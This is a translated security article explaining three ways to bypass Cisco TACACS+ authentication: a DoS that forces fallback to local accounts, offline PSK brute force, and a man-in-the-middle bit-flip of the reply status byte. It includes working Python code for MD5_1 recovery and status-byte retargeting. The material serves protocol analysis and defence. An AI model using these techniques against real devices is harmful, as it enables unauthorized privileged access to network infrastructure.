Three attack methods to bypass Cisco TACACS+

Source: Internet
Author: User
Tags: md5, hash


Original article: 3 attacks on cisco tacacs bypassing

In this article, the author introduces three methods for bypassing TACACS+ on Cisco devices:

No. 1: DoS attack to bypass Cisco TACACS+
No. 2: Local PSK cracking to bypass Cisco TACACS+
No. 3: Man-in-the-middle attack to bypass Cisco TACACS+

A large network usually contains many network devices, and managing access permissions on each of them is a real problem. Most companies therefore deploy a centralized access-control protocol. Cisco devices support TACACS+ and RADIUS.

0x00 Introduction to the TACACS protocol

TACACS (Terminal Access Controller Access Control System) is an authentication protocol. On UNIX networks it lets a remote-access server communicate with an authentication server in order to determine whether a user is permitted to access the network.

TACACS allows a client to accept a user name and password and forward them to a TACACS authentication server, usually called the TACACS daemon (or simply TACACSD). This server is normally a program running on a host; the host decides whether to accept or reject the request and returns a response. The TIP (the routing node the user wants to log on to, which receives the dial-in connection) then accepts or rejects access based on that response. In this way the decision process is "opened up": the algorithm and data used to make the decision are entirely under the control of whoever operates the TACACS daemon.

In 1990 Cisco introduced an extended version of TACACS called XTACACS (Extended TACACS). In newer networks both versions have largely been replaced by TACACS+ and RADIUS.

TACACS is defined in RFC 1492. By default it uses port 49, over TCP or UDP.

0x01 Introduction to the TACACS+ protocol

TACACS+ is a completely new protocol that is not compatible with TACACS or XTACACS. TACACS+ uses TCP port 49.

TACACS+ (Terminal Access Controller Access Control System Plus) is a security protocol that extends the functionality of TACACS. Like RADIUS, it uses a client/server model for communication between the NAS and the TACACS+ server.

The TACACS+ protocol is mainly used to provide AAA for access users and end users over PPP and VPDN (Virtual Private Dial-up Network).

AAA stands for Authentication, Authorization, and Accounting. It is a network-security management mechanism that provides those three security functions:

Authentication: confirms the identity of a remote user accessing the network and determines whether the visitor is a valid network user.

Authorization: grants different permissions to different users in order to restrict the services they can use. For example, after a user successfully logs on to a server, the administrator can authorize that user to access and print files on the server.

Accounting: records all of the user's operations while using network services, including the service type, start time, and data traffic. It is not only a billing mechanism; it also serves to monitor network security.

0x02 TACACS+ authentication process

The TACACS+ service usually runs on a dedicated server, and all network devices are configured to use that server for authentication. When a user authenticates on a switch, router, or other network device, the device sends the user's credentials to the TACACS+ server for verification. The server decides which permissions to assign for access to the relevant device, places the result in a response packet, and sends it back to the network device. The network device then relays the result to the user's terminal.

Figure 1: TACACS+ authentication process

This is a very convenient, centralized approach. Different users can be given different permissions on different devices, and all access and operations are logged on the server side. A central user store such as Active Directory or LDAP can also be plugged into this model. In addition, Cisco has published the TACACS+ protocol specification, so open-source implementations of the TACACS+ service now exist.

0x03 Three attack methods used to bypass Cisco TACACS+

No. 1 DoS attack to bypass Cisco TACACS+

The first method is not really an attack in itself. It is more of a trick, but in some situations it is very useful.

Let's assume the following scenario:

A penetration tester downloads the configuration file of a Cisco device from the target company's TFTP server. Even after cracking the device's local login credentials from that configuration file, the tester still cannot log on to the device, because the device uses the TACACS+ service for authentication rather than the local accounts.

Authenticating via TACACS+ is a typical network-device configuration. Now suppose that the network device cannot reach the TACACS+ server because something has gone wrong between the two. In that case the administrator would be locked out of the device. To handle this common situation, Cisco devices support fallback between authentication methods: the administrator can configure an ordered list of authentication methods.

On a Cisco device, a typical configuration for TACACS+ authentication looks like this:

aaa authentication login default group tacacs+ local

The preceding configuration means that TACACS+ is the preferred authentication method, with local authentication (querying the local user database) as the fallback. Note, however, that if the TACACS+ service simply does not find the user's credentials (i.e. authentication fails), the device will not fall back to the local method.

That is, local authentication is used only when the TACACS+ service is unavailable.

So the first attack method is simple: launch a DoS attack against the TACACS+ service, then log on with the local account of the Cisco device (obtained from the TFTP server and cracked). Because the TACACS+ service is unreachable during the DoS attack, the network device falls back to local authentication and grants the expected access. Many kinds of DoS attack can be used; for example, a short-lived DoS that opens a large number of TCP connections to the TACACS+ server.

Figure 2: DoS attack against the TACACS+ server

Knowledge required before introducing the second and third attack methods

Before introducing the second and third attack methods, we need to understand the TACACS+ protocol. Its data is transmitted either in plaintext or in an encrypted form. The encryption is a custom scheme based on a PSK (pre-shared key): the administrator sets a key on the TACACS+ server, and the same key is configured on every network device that talks to that server.

It is worth noting that only the user's credential data (the packet body) is encrypted; the TACACS+ header is not.

The encryption details are as follows:

The encrypted result (enc_data) is obtained by XORing the unencrypted credential data (data) with a special string, the pseudo_pad:

data^pseudo_pad = enc_data

The pseudo_pad is the concatenation of several MD5 hashes:

pseudo_pad = {MD5_1 [,MD5_2 [ ... ,MD5_n]]}

Each MD5 hash is computed over fields from the TACACS+ packet header, the key (PSK), and the previous MD5 hash value. The first MD5 therefore has no previous hash value to include:

MD5_1 = MD5{session_id, key, version, seq_no}
MD5_2 = MD5{session_id, key, version, seq_no, MD5_1}
....
MD5_n = MD5{session_id, key, version, seq_no, MD5_n-1}

Here session_id is a random identifier of the session; version is the TACACS+ protocol version; seq_no is the incrementing packet sequence number within the session; key is the PSK.

The following figure shows the encrypted data:

Figure 3: Encrypted data in a packet

No. 2 Local PSK cracking to bypass Cisco TACACS+

OK. With the above knowledge we can understand the next two attack methods.

Assume there is a Cisco network device and a TACACS+ server, and that we have captured the encrypted TACACS+ traffic exchanged between the two (for example, through a man-in-the-middle attack). Now we only need the PSK to decrypt that data, and then we can obtain a valid account.

Let's see how to do this. First, observe that every MD5 hash (especially the first one) is computed from a few fixed values, and only one of them is unknown: the PSK. All the other values (session_id, version, seq_no) can be read from the unencrypted TACACS+ packet header. So we can recover the PSK by local offline brute force, and we know that brute-forcing MD5 is fast. Before starting, however, we need to obtain the first MD5 hash (MD5_1).

We know that XOR is a reversible operation, so we can do the following. Starting from

data^pseudo_pad = enc_data

rearranging gives

pseudo_pad = data^enc_data

MD5_1 is just the first part of the pseudo_pad; an MD5 digest is 128 bits (16 bytes). To obtain MD5_1 we therefore need the first 16 bytes of both the encrypted data and the decrypted data (data). The encrypted data we can take from the captured packets. But how do we get 16 bytes of decrypted data?

Note that the request and response formats of TACACS+ packets differ between authentication, authorization, and accounting. Nevertheless, there is a general observation that applies to all of these packet types: there are almost no unknown or random values in the first 16 bytes of any of them.

I will not go into the technical details of every packet type; one example is enough to illustrate the idea. Consider the first packet the TACACS+ server sends in response (see the figure below). It consists of a few fields that carry no secret information plus a greeting message that the Cisco device shows to the user. Since we can connect to any Cisco device ourselves, we can easily obtain that response packet and learn the values of all its fields.

Figure 4: First response packet from the TACACS+ server

So, in practice, we can almost always determine the first 16 bytes of the decrypted data of any packet. That gives us MD5_1, and from there we can run the local offline brute-force attack on the PSK. If it succeeds, we can decrypt the entire captured communication. To simplify receiving the packets and extracting MD5_1, I wrote a small script named tac2cat.py. It is part of the TacoTaco project.

No. 3 Using man-in-the-middle attacks to bypass Cisco TACACS+

For the last attack method, we use a man-in-the-middle position to tamper with the data transmitted between the TACACS+ server and the Cisco device. Our goal is to obtain full privileges on the Cisco device.

When I re-examined the TACACS+ protocol, I found two additional "features".

The first is that the integrity of packets is not checked during TACACS+ transmission. So if a man-in-the-middle changes the encrypted part of a packet in transit, the decrypted result changes accordingly (because decryption is just an XOR), yet the TACACS+ server does not notice the modification and processes the altered data as if it were normal.

Figure 5: TACACS+ protocol packets

The second feature concerns the format of TACACS+ packets. For authentication and authorization, the first byte of the response packet body indicates the result of the access decision.

For example, 0x01 means the user has passed the server's authentication process (access granted), while 0x02 means the user's credentials are invalid.

In short, we only need to change a single byte of the server's response packet!

To obtain the pseudo_pad byte for that position, XOR the encrypted byte with the decrypted byte (we know the decrypted byte: if we enter incorrect credentials, the server rejects access and sets the first byte to 0x02). Then XOR that pseudo_pad byte with the success code (0x01), write the resulting byte into the encrypted packet, and forward the packet to the device.
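The pseudo_pad construction from the earlier section and the single-byte change just described, as an added Python example that is not code from the original article or from the TacoTaco project. It assumes the RFC 8907 ordering of the hash input and the authentication REPLY body layout; the session id, message and packet contents are constructed sample values.

```python
"""TACACS+ body obfuscation (RFC 8907, section 4.5), added to illustrate the
two properties the article relies on: a known 16-byte plaintext prefix reveals
MD5_1, and the unauthenticated XOR stream lets one ciphertext byte be
retargeted. All packet and session values below are constructed."""
import hashlib
import struct

VERSION = 0xC0           # TACACS+ major version 0xC, minor version 0
PASS, FAIL = 0x01, 0x02  # authentication REPLY status values named in the article

def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """MD5_1 || MD5_2 || ... truncated to `length` bytes, where
    MD5_n = MD5(session_id || key || version || seq_no || MD5_{n-1}) and MD5_1 has no previous hash."""
    fixed = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(fixed + prev).digest()
        pad += prev
    return pad[:length]

def obfuscate(body: bytes, session_id: int, key: bytes, seq_no: int) -> bytes:
    """Encrypt or decrypt a body (XOR is its own inverse)."""
    pad = pseudo_pad(session_id, key, VERSION, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))

def recover_md5_1(enc_body: bytes, known_prefix: bytes) -> bytes:
    """Known plaintext: ciphertext XOR plaintext over the first 16 bytes is
    MD5_1, which depends only on header fields and the PSK."""
    return bytes(c ^ p for c, p in zip(enc_body[:16], known_prefix[:16]))

def retarget_status_byte(enc_body: bytes, known: int, wanted: int) -> bytes:
    """pad[0] == enc[0] ^ known, so enc[0] ^ known ^ wanted decrypts to
    `wanted`; no integrity check exists to detect the change."""
    return bytes([enc_body[0] ^ known ^ wanted]) + enc_body[1:]

def demo() -> dict:
    """Constructed lab exchange; the key is the one from the article's router config."""
    key, session_id, seq_no, msg = b"12345", 0x1A2B3C4D, 2, b"Login invalid"
    # authentication REPLY body: status, flags, server_msg_len, data_len, server_msg
    reply = struct.pack("!BBHH", FAIL, 0, len(msg), 0) + msg
    enc = obfuscate(reply, session_id, key, seq_no)
    patched = obfuscate(retarget_status_byte(enc, FAIL, PASS), session_id, key, seq_no)
    return {
        "roundtrip_ok": obfuscate(enc, session_id, key, seq_no) == reply,
        "md5_1_recovered": recover_md5_1(enc, reply) == pseudo_pad(session_id, key, VERSION, seq_no, 16),
        "status_after_flip": patched[0],
        "rest_untouched": patched[1:] == reply[1:],
    }
```

The recovered MD5_1 depends on nothing but header fields and the PSK, which is why the only real defence is keeping the traffic off any segment where it could be captured or altered.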

Thus, from a man-in-the-middle position, we can alter the traffic and change the access decision (for both authentication and authorization) for any user who presents invalid credentials. We can also bypass the authentication of the special privileged mode ("enable" password) on a Cisco device.

To carry out the man-in-the-middle manipulation, I wrote a small script named tacflip.py, which is also part of the TacoTaco project.

I verified this attack method (bypassing authentication and privileged-user authorization) in the GNS3 simulator with a Cisco 7200 router and the open-source TACACS+ server tac_plus. The relevant part of the router's configuration is:

aaa authentication login default group tacacs+ local
aaa authentication enable default group tacacs+
aaa authorization exec default group tacacs+ local
tacacs-server host 192.168.182.136
tacacs-server directed-request
tacacs-server key 12345

A short video demonstrates the process of bypassing authentication/authorization, escalating privileges, and executing commands on the Cisco router.


0x04 Digression

In 2000, Solar Designer did some interesting research on the TACACS+ protocol (link here). Among other things, he found a replay attack, a leak of the user's password length, a bit-flip attack, and other vulnerabilities. However, I did not find any PoCs for these vulnerabilities.

My "research" on the TACACS+ protocol consists of thoughts accumulated over a long period of occasional interaction with the protocol. Because of this, I had forgotten the results of Solar Designer's study and rediscovered some of his findings on my own.

So the most important result of my work is probably the TacoTaco project, which is a concrete implementation of the attack methods described in this article.

0x05 Summary

At present, I believe the TACACS+ protocol does not provide the necessary level of protection against man-in-the-middle attacks.

That said, all of these attacks can be hard to carry out in practice, because Cisco recommends placing TACACS+ servers in a dedicated management VLAN that is reachable only by administrators and network devices. There are, of course, ways to get into such a VLAN and take control of it, but that is another story.
